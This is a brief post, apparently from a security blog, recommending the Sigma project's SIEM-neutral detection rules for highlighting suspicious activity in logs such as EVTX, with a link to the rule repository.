Leveraging Sigma Rules for Highlighting Activities of Interest

Sigma is a SIEM-neutral format for signatures. The project even provide a library to help process the rules to transform them in other formats needed for alerting. The rules processes different types of logs, (EVTX but others too) and can highlight malicious activities or supicious activities. Each rule has a description, a list of documented previously encountered false positive cases, links to publications that lead to the creation of the rule; and splits the conditions for alerting and exclusion explicitely. So far more than 1900 rules haves been written and more keeping being added weekly. The rules are freely available in https://github.com/SigmaHQ/sigma/rules/ – David (elhoim)